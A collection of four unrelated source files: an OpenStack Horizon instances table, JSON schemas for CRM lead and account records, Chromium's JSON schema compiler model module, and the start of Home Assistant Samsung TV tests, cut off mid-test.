    if not hasattr(instance, 'locked'):
        return ""
    if instance.locked:
        css = "fa fa-fw fa-lock"
        tooltip = _("This instance is currently locked. To enable more "
                    "actions on it, please unlock it by selecting Unlock "
                    "Instance from the actions menu.")
    else:
        css = "fa fa-fw fa-unlock text-muted"
        tooltip = _("This instance is unlocked.")
    markup = ('<span data-toggle="tooltip" title="{}" class="{}">'
              '</span>').format(tooltip, css)
    return mark_safe(markup)
def get_server_detail_link(obj, request):
    """Build the detail-page URL for instance *obj*, carrying along the
    current table pagination markers so "back" returns to the same page."""
    return get_url_with_pagination(request,
                                   InstancesTable._meta.pagination_param,
                                   InstancesTable._meta.prev_pagination_param,
                                   'horizon:project:instances:detail',
                                   obj.id)
class InstancesTable(tables.DataTable):
    """Data table of Nova instances for the project dashboard."""

    # Task states considered "settled" for row polling; any other task
    # state keeps the row auto-refreshing.
    TASK_STATUS_CHOICES = (
        (None, True),
        ("none", True)
    )
    # (status value, is_ok) pairs; False marks the error state so the row
    # is rendered as failed once it stops transitioning.
    STATUS_CHOICES = (
        ("active", True),
        ("shutoff", True),
        ("suspended", True),
        ("paused", True),
        ("error", False),
        ("rescue", True),
        ("shelved", True),
        ("shelved_offloaded", True),
    )
    name = tables.WrappingColumn("name",
                                 link=get_server_detail_link,
                                 verbose_name=_("Instance Name"))
    image_name = tables.WrappingColumn("image_name",
                                       verbose_name=_("Image Name"))
    ip = tables.Column(get_ips,
                       verbose_name=_("IP Address"),
                       attrs={'data-type': "ip"})
    flavor = tables.Column(get_flavor,
                           sortable=False,
                           verbose_name=_("Flavor"))
    keypair = tables.Column(get_keyname, verbose_name=_("Key Pair"))
    status = tables.Column("status",
                           filters=(title, filters.replace_underscores),
                           verbose_name=_("Status"),
                           status=True,
                           status_choices=STATUS_CHOICES,
                           display_choices=STATUS_DISPLAY_CHOICES)
    # Icon-only column: empty verbose_name keeps the header blank.
    locked = tables.Column(render_locked,
                           verbose_name="",
                           sortable=False)
    az = tables.Column("availability_zone",
                       verbose_name=_("Availability Zone"))
    task = tables.Column("OS-EXT-STS:task_state",
                         verbose_name=_("Task"),
                         empty_value=TASK_DISPLAY_NONE,
                         status=True,
                         status_choices=TASK_STATUS_CHOICES,
                         display_choices=TASK_DISPLAY_CHOICES)
    state = tables.Column(get_power_state,
                          filters=(title, filters.replace_underscores),
                          verbose_name=_("Power State"),
                          display_choices=POWER_DISPLAY_CHOICES)
    created = tables.Column("created",
                            verbose_name=_("Age"),
                            filters=(filters.parse_isotime,
                                     filters.timesince_sortable),
                            attrs={'data-type': 'timesince'})

    class Meta(object):
        name = "instances"
        verbose_name = _("Instances")
        # Rows keep auto-refreshing until both columns report stable values.
        status_columns = ["status", "task"]
        row_class = UpdateRow
        table_actions_menu = (StartInstance, StopInstance, SoftRebootInstance)
        # Evaluated once at class-definition time: include whichever launch
        # workflows (legacy and/or Angular "NG") are enabled in settings.
        launch_actions = ()
        if getattr(settings, 'LAUNCH_INSTANCE_LEGACY_ENABLED', False):
            launch_actions = (LaunchLink,) + launch_actions
        if getattr(settings, 'LAUNCH_INSTANCE_NG_ENABLED', True):
            launch_actions = (LaunchLinkNG,) + launch_actions
        table_actions = launch_actions + (DeleteInstance,
                                          InstancesFilterAction)
        row_actions = (StartInstance, ConfirmResize, RevertResize,
                       CreateSnapshot, AssociateIP, DisassociateIP,
                       AttachInterface, DetachInterface, EditInstance,
                       AttachVolume, DetachVolume,
                       UpdateMetadata, DecryptInstancePassword,
                       EditInstanceSecurityGroups,
                       EditPortSecurityGroups,
                       ConsoleLink, LogLink,
                       RescueInstance, UnRescueInstance,
                       TogglePause, ToggleSuspend, ToggleShelve,
                       ResizeLink, LockInstance, UnlockInstance,
                       SoftRebootInstance, RebootInstance,
                       StopInstance, RebuildInstance, DeleteInstance)
| |
# ---------------------------------------------------------------------------
# Reusable field schemas.
#
# NOTE(review): 'required' and 'blank' are not standard JSON Schema keywords;
# they are extensions understood by validictory-style validators -- confirm
# against the validation library actually in use.
# ---------------------------------------------------------------------------

# Non-empty string, optional field.
string_schema = {
    'type': 'string',
    'maxLength': 255,
    'minLength': 1,
    'blank': False,
    'required': False
}
# Optional string where an empty value is acceptable.
string_schema_allow_empty = {
    'type': 'string',
    'maxLength': 255,
    'blank': True,
    'required': False
}
# NOTE(review): 'items' given as a one-element LIST means positional (tuple)
# validation in standard JSON Schema, not "every element is a string" --
# verify the validator treats this as intended.
array_of_strings_schema = {
    'type': 'array',
    'uniqueItems': True,
    'items': [
        string_schema
    ],
    'required': False
}
# Non-empty string, mandatory field.
string_schema_required = {
    'type': 'string',
    'maxLength': 255,
    'minLength': 1,
    'blank': False,
    'required': True
}
boolean_schema = {
    'type': 'boolean',
    'required': False
}
# Non-negative integer.
integer_schema = {
    'type': 'integer',
    'minimum': 0,
    'required': False
}

# Payload accepted when creating a lead: every field is optional here
# (contrast with lead_schema below, where several fields are mandatory).
create_lead_schema = {
    'type': 'object',
    'additionalProperties': False,
    'properties': {
        'firstname': string_schema,
        'lastname': string_schema,
        'phone': string_schema,
        'description': string_schema,
        'leadsource': string_schema,
        'title': string_schema,
        'email': string_schema,
        'company': string_schema,
        'rating': string_schema,
        'postalcode': string_schema,
        'salutation': string_schema,
        'industry': string_schema,
        'street': string_schema,
        'status': string_schema,
        'isunreadbyowner': boolean_schema,
        'city': string_schema,
        'state': string_schema,
        'country': string_schema,
        'fax': string_schema,
        'annualrevenue': integer_schema
    }
}

# Contact record: only 'lastname' is mandatory.
contact_schema = {
    'type': 'object',
    'additionalProperties': False,
    'properties': {
        'phone': string_schema,
        'email': string_schema,
        'firstname': string_schema,
        'lastname': string_schema_required,
        'department': string_schema,
        'mobilephone': string_schema,
        'title': string_schema,
        'lastmodifieddate': string_schema,
        'accountid': string_schema,
        'lastreferenceddate': string_schema,
        'salutation': string_schema,
        'name': string_schema,
        'createdbyid': string_schema,
        'ownerid': string_schema,
        'photourl': string_schema,
        # NOTE(review): the three flags below look boolean-ish but are
        # declared as strings -- presumably matching the upstream API's
        # string representation; confirm before tightening.
        'isdeleted': string_schema,
        'isemailbounced': string_schema,
        'hasoptedoutofemail': string_schema,
        'lastvieweddate': string_schema,
        'birthdate': string_schema,
        'systemmodstamp': string_schema,
        'leadsource': string_schema,
        'createddate': string_schema,
        'fax': string_schema,
        'lastmodifiedbyid': string_schema,
        'mailingstreet': string_schema
    }
}

# Full lead record: 'lastname', 'company' and 'status' are mandatory.
lead_schema = {
    'type': 'object',
    'additionalProperties': False,
    'properties': {
        "firstname": string_schema,
        "lastname": string_schema_required,
        "phone": string_schema,
        "description": string_schema,
        "leadsource": string_schema,
        "title": string_schema,
        "email": string_schema,
        "company": string_schema_required,
        "rating": string_schema,
        "postalcode": string_schema,
        "salutation": string_schema,
        "industry": string_schema,
        "street": string_schema,
        "status": string_schema_required,
        "isunreadbyowner": boolean_schema,
        "city": string_schema,
        "state": string_schema,
        "country": string_schema,
        "fax": string_schema,
        "annualrevenue": integer_schema
    }
}

# Partial-update payload: same fields as lead_schema, nothing mandatory.
lead_schema_update = {
    'type': 'object',
    'additionalProperties': False,
    'properties': {
        "firstname": string_schema,
        "lastname": string_schema,
        "phone": string_schema,
        "description": string_schema,
        "leadsource": string_schema,
        "title": string_schema,
        "email": string_schema,
        "company": string_schema,
        "rating": string_schema,
        "postalcode": string_schema,
        "salutation": string_schema,
        "industry": string_schema,
        "street": string_schema,
        "status": string_schema,
        "isunreadbyowner": boolean_schema,
        "city": string_schema,
        "state": string_schema,
        "country": string_schema,
        "fax": string_schema,
        "annualrevenue": integer_schema
    }
}

# Account record: only 'name' is mandatory.
account_schema = {
    'type': 'object',
    'additionalProperties': False,
    'properties': {
        "name": string_schema_required,
        "website": string_schema,
        "phone": string_schema,
        "billingstreet": string_schema,
        "billingcity": string_schema,
        "billingstate": string_schema,
        "billingpostalcode": string_schema,
        "billingcountry": string_schema,
        "type": string_schema,
        "annualrevenue": integer_schema,
        "numberofemployees": integer_schema,
        "description": string_schema,
        "shippingstreet": string_schema,
        "accountnumber": string_schema,
        "fax": string_schema,
        "rating": string_schema,
        "ownership": string_schema,
        "sic": string_schema,
        "industry": string_schema
    }
}

# Closed set of supported provider element keys.
instance_key_schema = {
    'enum': ['sfdc', 'sugar'],
    'required': False
}

# Description of a provider element; additionalProperties is not disabled
# here, so extra keys pass validation.
instance_element_schema = {
    'type': 'object',
    'properties': {
        'id': integer_schema,
        'name': string_schema,
        'createdDate': integer_schema,
        'updatedDate': integer_schema,
        'key': instance_key_schema,
        'description': string_schema,
        'active': boolean_schema,
        'deleted': boolean_schema,
        'typeOauth': boolean_schema,
        'trialAccount': boolean_schema,
        'trialAccountDescription': string_schema,
        'existingAccountDescription': string_schema,
        'configDescription': string_schema,
        'signupURL': string_schema,
        'authenticationType': string_schema,
        'hub': string_schema,
        'transformationsEnabled': boolean_schema
    }
}

# Payload for provisioning an element instance (OAuth config + caching).
instance_provision_schema = {
    "type": "object",
    "properties": {
        "maxcachesize": integer_schema,
        "element": instance_element_schema,
        "providerData": {
            "type": "object",
            "properties": {
                "code": string_schema,
            },
            'required': False
        },
        "configuration": {
            "type": 'object',
            'properties': {
                "oauth.callback.url": string_schema,
                "oauth.api.key": string_schema,
                "oauth.api.secret": string_schema
            },
            'required': False
        },
        "tags": array_of_strings_schema,
        "name": string_schema,
        "valid": boolean_schema,
        "channelname": string_schema,
        "updateddate": integer_schema,
        "id": integer_schema,
        "cachetimetolive": integer_schema,
        "token": string_schema,
        "description": string_schema,
        "cachingenabled": boolean_schema,
        "createddate": integer_schema,
        "disabled": boolean_schema
    }
}
| |
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os.path
from json_parse import OrderedDict
from memoize import memoize
class ParseException(Exception):
  """Raised when data in the model is invalid.

  The message is prefixed with the path through the model (computed by
  _GetModelHierarchy) so the offending entity can be located.
  """

  def __init__(self, parent, message):
    path = _GetModelHierarchy(parent)
    path.append(message)
    super(ParseException, self).__init__(
        'Model parse exception at:\n' + '\n'.join(path))
class Model(object):
  """Model of all namespaces that comprise an API.

  Properties:
  - |namespaces| a map of a namespace name to its model.Namespace
  """
  def __init__(self):
    self.namespaces = {}

  def AddNamespace(self, json, source_file, include_compiler_options=False):
    """Add a namespace's json to the model and returns the namespace.
    """
    namespace = Namespace(json,
                          source_file,
                          include_compiler_options=include_compiler_options)
    # Keyed by declared name: re-adding a namespace with the same name
    # silently replaces the earlier entry.
    self.namespaces[namespace.name] = namespace
    return namespace
class Namespace(object):
  """An API namespace.

  Properties:
  - |name| the name of the namespace
  - |description| the description of the namespace
  - |unix_name| the unix_name of the namespace
  - |source_file| the file that contained the namespace definition
  - |source_file_dir| the directory component of |source_file|
  - |source_file_filename| the filename component of |source_file|
  - |platforms| if not None, the list of platforms that the namespace is
                available to
  - |types| a map of type names to their model.Type
  - |functions| a map of function names to their model.Function
  - |events| a map of event names to their model.Function
  - |properties| a map of property names to their model.Property
  - |compiler_options| the compiler_options dict, only not empty if
    |include_compiler_options| is True
  """
  def __init__(self, json, source_file, include_compiler_options=False):
    self.name = json['namespace']
    if 'description' not in json:
      # TODO(kalman): Go back to throwing an error here.
      print('%s must have a "description" field. This will appear '
            'on the API summary page.' % self.name)
      # Patch the incoming dict so downstream lookups succeed.
      json['description'] = ''
    self.description = json['description']
    self.unix_name = UnixName(self.name)
    self.source_file = source_file
    self.source_file_dir, self.source_file_filename = os.path.split(source_file)
    # A namespace is the root of the model hierarchy.
    self.parent = None
    self.platforms = _GetPlatforms(json)
    # Top-level entities may originate both from the JSON schema and from
    # client code (e.g. as function results).
    toplevel_origin = Origin(from_client=True, from_json=True)
    self.types = _GetTypes(self, json, self, toplevel_origin)
    self.functions = _GetFunctions(self, json, self)
    self.events = _GetEvents(self, json, self)
    self.properties = _GetProperties(self, json, self, toplevel_origin)
    self.compiler_options = (json.get('compiler_options', {})
                             if include_compiler_options else {})
class Origin(object):
  """Records where instances of a model object may come from.

  |from_client| -- instances may be produced by users of the generated code
  (for example, function results).
  |from_json| -- instances may be parsed out of the JSON (for example,
  function parameters).
  Both flags may be set at once, e.g. for types declared at the top level
  of a schema.
  """

  def __init__(self, from_client=False, from_json=False):
    # An origin that is neither is meaningless; reject it early.
    if not (from_client or from_json):
      raise ValueError('One of from_client or from_json must be true')
    self.from_client = from_client
    self.from_json = from_json
class Type(object):
  """A Type defined in the json.

  Properties:
  - |name| the type name
  - |namespace| the Type's namespace
  - |description| the description of the type (if provided)
  - |properties| a map of property unix_names to their model.Property
  - |functions| a map of function names to their model.Function
  - |events| a map of event names to their model.Event
  - |origin| the Origin of the type
  - |property_type| the PropertyType of this Type
  - |item_type| if this is an array, the type of items in the array
  - |simple_name| the name of this Type without a namespace
  - |additional_properties| the type of the additional properties, if any is
                            specified
  """
  def __init__(self,
               parent,
               name,
               json,
               namespace,
               origin):
    self.name = name
    self.namespace = namespace
    self.simple_name = _StripNamespace(self.name, namespace)
    self.unix_name = UnixName(self.name)
    self.description = json.get('description', None)
    self.origin = origin
    self.parent = parent
    self.instance_of = json.get('isInstanceOf', None)
    # TODO(kalman): Only objects need functions/events/properties, but callers
    # assume that all types have them. Fix this.
    self.functions = _GetFunctions(self, json, namespace)
    self.events = _GetEvents(self, json, namespace)
    self.properties = _GetProperties(self, json, namespace, origin)
    # Branch order matters below: '$ref', 'enum' and 'choices' entries have
    # no (or an accompanying) 'type' key, so they are tested explicitly.
    json_type = json.get('type', None)
    if json_type == 'array':
      self.property_type = PropertyType.ARRAY
      self.item_type = Type(
          self, '%sType' % name, json['items'], namespace, origin)
    elif '$ref' in json:
      self.property_type = PropertyType.REF
      self.ref_type = json['$ref']
    elif 'enum' in json and json_type == 'string':
      self.property_type = PropertyType.ENUM
      self.enum_values = [value for value in json['enum']]
    elif json_type == 'any':
      self.property_type = PropertyType.ANY
    elif json_type == 'binary':
      self.property_type = PropertyType.BINARY
    elif json_type == 'boolean':
      self.property_type = PropertyType.BOOLEAN
    elif json_type == 'integer':
      self.property_type = PropertyType.INTEGER
    elif (json_type == 'double' or
          json_type == 'number'):
      self.property_type = PropertyType.DOUBLE
    elif json_type == 'string':
      self.property_type = PropertyType.STRING
    elif 'choices' in json:
      self.property_type = PropertyType.CHOICES
      def generate_type_name(type_json):
        # Best-effort readable name for an unnamed choice: pluralised item
        # name for arrays, the $ref target, or the raw JSON type.
        if 'items' in type_json:
          return '%ss' % generate_type_name(type_json['items'])
        if '$ref' in type_json:
          return type_json['$ref']
        if 'type' in type_json:
          return type_json['type']
        return None
      self.choices = [
          Type(self,
               generate_type_name(choice) or 'choice%s' % i,
               choice,
               namespace,
               origin)
          for i, choice in enumerate(json['choices'])]
    elif json_type == 'object':
      # A bare object with none of these keys is almost certainly a schema
      # mistake, so fail loudly.
      if not (
          'isInstanceOf' in json or
          'properties' in json or
          'additionalProperties' in json or
          'functions' in json or
          'events' in json):
        raise ParseException(self, name + " has no properties or functions")
      self.property_type = PropertyType.OBJECT
      additional_properties_json = json.get('additionalProperties', None)
      if additional_properties_json is not None:
        self.additional_properties = Type(self,
                                          'additionalProperties',
                                          additional_properties_json,
                                          namespace,
                                          origin)
      else:
        self.additional_properties = None
    elif json_type == 'function':
      self.property_type = PropertyType.FUNCTION
      # Sometimes we might have an unnamed function, e.g. if it's a property
      # of an object. Use the name of the property in that case.
      function_name = json.get('name', name)
      self.function = Function(self, function_name, json, namespace, origin)
    else:
      raise ParseException(self, 'Unsupported JSON type %s' % json_type)
class Function(object):
  """A Function defined in the API.

  Properties:
  - |name| the function name
  - |platforms| if not None, the list of platforms that the function is
                available to
  - |params| a list of parameters to the function (order matters). A separate
             parameter is used for each choice of a 'choices' parameter
  - |description| a description of the function (if provided)
  - |callback| the callback parameter to the function. There should be exactly
               one
  - |optional| whether the Function is "optional"; this only makes sense to be
               present when the Function is representing a callback property
  - |simple_name| the name of this Function without a namespace
  - |returns| the return type of the function; None if the function does not
              return a value
  """
  def __init__(self,
               parent,
               name,
               json,
               namespace,
               origin):
    self.name = name
    self.simple_name = _StripNamespace(self.name, namespace)
    self.platforms = _GetPlatforms(json)
    self.params = []
    self.description = json.get('description')
    self.callback = None
    self.optional = json.get('optional', False)
    self.parent = parent
    self.nocompile = json.get('nocompile')
    options = json.get('options', {})
    self.conditions = options.get('conditions', [])
    self.actions = options.get('actions', [])
    self.supports_listeners = options.get('supportsListeners', True)
    self.supports_rules = options.get('supportsRules', False)

    def GeneratePropertyFromParam(p):
      # Wrap a raw parameter dict in a model.Property owned by this function.
      return Property(self, p['name'], p, namespace, origin)

    self.filters = [GeneratePropertyFromParam(filter)
                    for filter in json.get('filters', [])]
    # Only the LAST function-typed parameter is treated as the callback;
    # any earlier ones are demoted to ordinary parameters.
    callback_param = None
    for param in json.get('parameters', []):
      if param.get('type') == 'function':
        if callback_param:
          # No ParseException because the webstore has this.
          # Instead, pretend all intermediate callbacks are properties.
          self.params.append(GeneratePropertyFromParam(callback_param))
        callback_param = param
      else:
        self.params.append(GeneratePropertyFromParam(param))
    if callback_param:
      self.callback = Function(self,
                               callback_param['name'],
                               callback_param,
                               namespace,
                               Origin(from_client=True))
    self.returns = None
    if 'returns' in json:
      self.returns = Type(self,
                          '%sReturnType' % name,
                          json['returns'],
                          namespace,
                          origin)
class Property(object):
  """A property of a type OR a parameter to a function.

  Properties:
  - |name| name of the property as in the json. This shouldn't change since
           it is the key used to access DictionaryValues
  - |unix_name| the unix_style_name of the property. Used as variable name
  - |optional| a boolean representing whether the property is optional
  - |description| a description of the property (if provided)
  - |type_| the model.Type of this property
  - |simple_name| the name of this Property without a namespace
  """
  def __init__(self, parent, name, json, namespace, origin):
    """Creates a Property from JSON.
    """
    self.parent = parent
    self.name = name
    self._unix_name = UnixName(self.name)
    # Once read via the unix_name property the name is frozen; see
    # SetUnixName below.
    self._unix_name_used = False
    self.origin = origin
    self.simple_name = _StripNamespace(self.name, namespace)
    self.description = json.get('description', None)
    self.optional = json.get('optional', None)
    self.instance_of = json.get('isInstanceOf', None)
    # HACK: only support very specific value types.
    is_allowed_value = (
        '$ref' not in json and
        ('type' not in json or json['type'] == 'integer'
         or json['type'] == 'string'))
    self.value = None
    if 'value' in json and is_allowed_value:
      self.value = json['value']
      if 'type' not in json:
        # Sometimes the type of the value is left out, and we need to figure
        # it out for ourselves.  Note this mutates the caller's json dict.
        if isinstance(self.value, int):
          json['type'] = 'integer'
        # NOTE(review): basestring exists only on Python 2 -- this module
        # appears to target the Python 2 toolchain; confirm before running
        # under Python 3.
        elif isinstance(self.value, basestring):
          json['type'] = 'string'
        else:
          # TODO(kalman): support more types as necessary.
          raise ParseException(
              parent,
              '"%s" is not a supported type for "value"' % type(self.value))
    self.type_ = Type(parent, name, json, namespace, origin)

  def GetUnixName(self):
    """Gets the property's unix_name. Raises AttributeError if not set.
    """
    if not self._unix_name:
      raise AttributeError('No unix_name set on %s' % self.name)
    self._unix_name_used = True
    return self._unix_name

  def SetUnixName(self, unix_name):
    """Set the property's unix_name. Raises AttributeError if the unix_name has
    already been used (GetUnixName has been called).
    """
    if unix_name == self._unix_name:
      return
    if self._unix_name_used:
      raise AttributeError(
          'Cannot set the unix_name on %s; '
          'it is already used elsewhere as %s' %
          (self.name, self._unix_name))
    self._unix_name = unix_name

  # Expose unix_name through a property so that reads mark it as "used".
  unix_name = property(GetUnixName, SetUnixName)
class _Enum(object):
  """Base class for enum values carrying a "name" attribute.

  Supplies repr/str plus equality and inequality based on the concrete type
  and the name, so values compare correctly even across pickling.
  """

  @staticmethod
  def GetAll(cls):
    """Yields all _Enum objects declared in |cls|.
    """
    for attr in dir(cls):
      candidate = getattr(cls, attr)
      if isinstance(candidate, _Enum):
        yield candidate

  def __init__(self, name):
    self.name = name

  def __eq__(self, other):
    return type(self) == type(other) and self.name == other.name

  def __ne__(self, other):
    return not self.__eq__(other)

  def __repr__(self):
    return self.name

  def __str__(self):
    return self.name
class _PropertyTypeInfo(_Enum):
  """An _Enum value for PropertyType.

  |is_fundamental| is True for primitive JSON values (boolean, double,
  int64, integer, string) and False for compound/special types.
  """
  def __init__(self, is_fundamental, name):
    _Enum.__init__(self, name)
    self.is_fundamental = is_fundamental
class PropertyType(object):
  """Enum of different types of properties/parameters.
  """
  # First argument is is_fundamental (see _PropertyTypeInfo).
  ANY = _PropertyTypeInfo(False, "any")
  ARRAY = _PropertyTypeInfo(False, "array")
  BINARY = _PropertyTypeInfo(False, "binary")
  BOOLEAN = _PropertyTypeInfo(True, "boolean")
  CHOICES = _PropertyTypeInfo(False, "choices")
  DOUBLE = _PropertyTypeInfo(True, "double")
  ENUM = _PropertyTypeInfo(False, "enum")
  FUNCTION = _PropertyTypeInfo(False, "function")
  INT64 = _PropertyTypeInfo(True, "int64")
  INTEGER = _PropertyTypeInfo(True, "integer")
  OBJECT = _PropertyTypeInfo(False, "object")
  REF = _PropertyTypeInfo(False, "ref")
  STRING = _PropertyTypeInfo(True, "string")
@memoize
def UnixName(name):
  """Converts a lowerCamelCase (possibly dotted) string to unix_style."""
  pieces = []
  for idx, ch in enumerate(name):
    prev = name[idx - 1] if idx else None
    if ch.isupper() and prev is not None and prev != '_':
      # lowerUpper -> lower_Upper; ACMEWidgets -> ACME_Widgets.
      if prev.islower() or (idx + 1 < len(name) and name[idx + 1].islower()):
        pieces.append('_')
    # Dots become underscores; everything else is lowercased.
    pieces.append('_' if ch == '.' else ch.lower())
  return ''.join(pieces)
def _StripNamespace(name, namespace):
  """Removes a leading "<namespace>." prefix from |name|, if present."""
  prefix = namespace.name + '.'
  return name[len(prefix):] if name.startswith(prefix) else name
def _GetModelHierarchy(entity):
  """Returns the hierarchy of the given model entity."""
  parts = []
  node = entity
  while node is not None:
    parts.append(getattr(node, 'name', repr(node)))
    if isinstance(node, Namespace):
      # Record the defining source file alongside the namespace.
      parts.insert(0, ' in %s' % node.source_file)
    node = getattr(node, 'parent', None)
  # Walked child -> parent; present it root-first.
  return list(reversed(parts))
def _GetTypes(parent, json, namespace, origin):
  """Creates Type objects extracted from |json|, keyed by type name."""
  result = OrderedDict()
  for entry in json.get('types', []):
    new_type = Type(parent, entry['id'], entry, namespace, origin)
    result[new_type.name] = new_type
  return result
def _GetFunctions(parent, json, namespace):
  """Creates Function objects extracted from |json|, keyed by name."""
  result = OrderedDict()
  for fn_json in json.get('functions', []):
    fn = Function(parent,
                  fn_json['name'],
                  fn_json,
                  namespace,
                  Origin(from_json=True))
    result[fn.name] = fn
  return result
def _GetEvents(parent, json, namespace):
  """Creates Function objects generated from the events in |json|."""
  result = OrderedDict()
  for ev_json in json.get('events', []):
    # Events originate from the client side (listeners are user code).
    ev = Function(parent,
                  ev_json['name'],
                  ev_json,
                  namespace,
                  Origin(from_client=True))
    result[ev.name] = ev
  return result
def _GetProperties(parent, json, namespace, origin):
  """Generates Property objects extracted from |json|, keyed by name."""
  result = OrderedDict()
  for prop_name, prop_json in json.get('properties', {}).items():
    result[prop_name] = Property(parent, prop_name, prop_json, namespace,
                                 origin)
  return result
class _PlatformInfo(_Enum):
  """An _Enum value naming a single supported platform."""
  def __init__(self, name):
    _Enum.__init__(self, name)
class Platforms(object):
  """Enum of the possible platforms.

  All declared values are discoverable via _Enum.GetAll(Platforms).
  """
  CHROMEOS = _PlatformInfo("chromeos")
  CHROMEOS_TOUCH = _PlatformInfo("chromeos_touch")
  LINUX = _PlatformInfo("linux")
  MAC = _PlatformInfo("mac")
  WIN = _PlatformInfo("win")
def _GetPlatforms(json):
  """Returns the Platforms entries named in |json|'s "platforms" key,
  or None when the key is absent.  Unrecognised names are skipped."""
  if 'platforms' not in json:
    return None
  matched = []
  for wanted in json['platforms']:
    for candidate in _Enum.GetAll(Platforms):
      if wanted == candidate.name:
        matched.append(candidate)
        break
  return matched
| |
"""Tests for samsungtv component."""
import asyncio
from datetime import timedelta
import logging
from asynctest import mock
from asynctest.mock import call, patch
import pytest
from samsungctl import exceptions
from websocket import WebSocketException
from homeassistant.components.media_player import DEVICE_CLASS_TV
from homeassistant.components.media_player.const import (
ATTR_INPUT_SOURCE,
ATTR_MEDIA_CONTENT_ID,
ATTR_MEDIA_CONTENT_TYPE,
ATTR_MEDIA_VOLUME_MUTED,
DOMAIN,
MEDIA_TYPE_CHANNEL,
MEDIA_TYPE_URL,
SERVICE_PLAY_MEDIA,
SERVICE_SELECT_SOURCE,
SUPPORT_TURN_ON,
)
from homeassistant.components.samsungtv.const import (
CONF_ON_ACTION,
DOMAIN as SAMSUNGTV_DOMAIN,
)
from homeassistant.components.samsungtv.media_player import SUPPORT_SAMSUNGTV
from homeassistant.const import (
ATTR_DEVICE_CLASS,
ATTR_ENTITY_ID,
ATTR_FRIENDLY_NAME,
ATTR_SUPPORTED_FEATURES,
CONF_HOST,
CONF_NAME,
CONF_PORT,
SERVICE_MEDIA_NEXT_TRACK,
SERVICE_MEDIA_PAUSE,
SERVICE_MEDIA_PLAY,
SERVICE_MEDIA_PREVIOUS_TRACK,
SERVICE_TURN_OFF,
SERVICE_TURN_ON,
SERVICE_VOLUME_DOWN,
SERVICE_VOLUME_MUTE,
SERVICE_VOLUME_UP,
STATE_OFF,
STATE_ON,
)
from homeassistant.setup import async_setup_component
import homeassistant.util.dt as dt_util
from tests.common import async_fire_time_changed
# Entity backed by a TV that has an on-action configured (websocket port).
ENTITY_ID = f"{DOMAIN}.fake"
MOCK_CONFIG = {
    SAMSUNGTV_DOMAIN: [
        {
            CONF_HOST: "fake",
            CONF_NAME: "fake",
            CONF_PORT: 8001,
            CONF_ON_ACTION: [{"delay": "00:00:01"}],
        }
    ]
}

# Entity backed by a legacy TV (port 55000) without any turn-on action.
ENTITY_ID_NOTURNON = f"{DOMAIN}.fake_noturnon"
MOCK_CONFIG_NOTURNON = {
    SAMSUNGTV_DOMAIN: [
        {CONF_HOST: "fake_noturnon", CONF_NAME: "fake_noturnon", CONF_PORT: 55000}
    ]
}
@pytest.fixture(name="remote")
def remote_fixture():
    """Patch the samsungctl Remote."""
    # Patch both the config-flow and media-player entry points plus the
    # socket modules used for host resolution, so no real network I/O runs.
    with patch("homeassistant.components.samsungtv.config_flow.Remote"), patch(
        "homeassistant.components.samsungtv.config_flow.socket"
    ) as socket1, patch(
        "homeassistant.components.samsungtv.media_player.SamsungRemote"
    ) as remote_class, patch(
        "homeassistant.components.samsungtv.socket"
    ) as socket2:
        remote = mock.Mock()
        remote_class.return_value = remote
        socket1.gethostbyname.return_value = "FAKE_IP_ADDRESS"
        socket2.gethostbyname.return_value = "FAKE_IP_ADDRESS"
        # Yield (not return) so the patches stay active for the whole test.
        yield remote
@pytest.fixture(name="delay")
def delay_fixture():
    """Patch the delay script function."""
    # The on-action in MOCK_CONFIG is a delay script; patching async_run
    # lets tests assert it ran without actually sleeping.
    with patch(
        "homeassistant.components.samsungtv.media_player.Script.async_run"
    ) as delay:
        yield delay
@pytest.fixture
def mock_now():
    """Fixture for dtutil.now."""
    # A fixed "now" so tests can advance time deterministically.
    return dt_util.utcnow()
async def setup_samsungtv(hass, config):
    """Set up mock Samsung TV."""
    await async_setup_component(hass, SAMSUNGTV_DOMAIN, config)
    # Wait for the platform setup tasks to finish before asserting.
    await hass.async_block_till_done()
async def test_setup_with_turnon(hass, remote):
    """Test setup of platform."""
    await setup_samsungtv(hass, MOCK_CONFIG)
    # Entity exists once the platform finished setting up.
    assert hass.states.get(ENTITY_ID)


async def test_setup_without_turnon(hass, remote):
    """Test setup of platform."""
    await setup_samsungtv(hass, MOCK_CONFIG_NOTURNON)
    assert hass.states.get(ENTITY_ID_NOTURNON)
async def test_update_on(hass, remote, mock_now):
    """Testing update tv on."""
    await setup_samsungtv(hass, MOCK_CONFIG)
    # Advance the clock so the entity's scheduled poll runs.
    next_update = mock_now + timedelta(minutes=5)
    with patch("homeassistant.util.dt.utcnow", return_value=next_update):
        async_fire_time_changed(hass, next_update)
        await hass.async_block_till_done()
    state = hass.states.get(ENTITY_ID)
    assert state.state == STATE_ON


async def test_update_off(hass, remote, mock_now):
    """Testing update tv off."""
    await setup_samsungtv(hass, MOCK_CONFIG)
    # First connection attempt fails with OSError (TV unreachable), which
    # the entity reports as "off".
    with patch(
        "homeassistant.components.samsungtv.media_player.SamsungRemote",
        side_effect=[OSError("Boom"), mock.DEFAULT],
    ):
        next_update = mock_now + timedelta(minutes=5)
        with patch("homeassistant.util.dt.utcnow", return_value=next_update):
            async_fire_time_changed(hass, next_update)
            await hass.async_block_till_done()
        state = hass.states.get(ENTITY_ID)
        assert state.state == STATE_OFF


async def test_update_access_denied(hass, remote, mock_now):
    """Testing update tv access denied exception."""
    await setup_samsungtv(hass, MOCK_CONFIG)
    with patch(
        "homeassistant.components.samsungtv.media_player.SamsungRemote",
        side_effect=exceptions.AccessDenied("Boom"),
    ):
        next_update = mock_now + timedelta(minutes=5)
        with patch("homeassistant.util.dt.utcnow", return_value=next_update):
            async_fire_time_changed(hass, next_update)
            await hass.async_block_till_done()
    # AccessDenied must trigger a reauthentication config flow.
    assert [
        flow
        for flow in hass.config_entries.flow.async_progress()
        if flow["context"]["source"] == "reauth"
    ]


async def test_update_unhandled_response(hass, remote, mock_now):
    """Testing update tv unhandled response exception."""
    await setup_samsungtv(hass, MOCK_CONFIG)
    # UnhandledResponse on the first attempt is tolerated; the TV is still
    # reported as "on".
    with patch(
        "homeassistant.components.samsungtv.media_player.SamsungRemote",
        side_effect=[exceptions.UnhandledResponse("Boom"), mock.DEFAULT],
    ):
        next_update = mock_now + timedelta(minutes=5)
        with patch("homeassistant.util.dt.utcnow", return_value=next_update):
            async_fire_time_changed(hass, next_update)
            await hass.async_block_till_done()
        state = hass.states.get(ENTITY_ID)
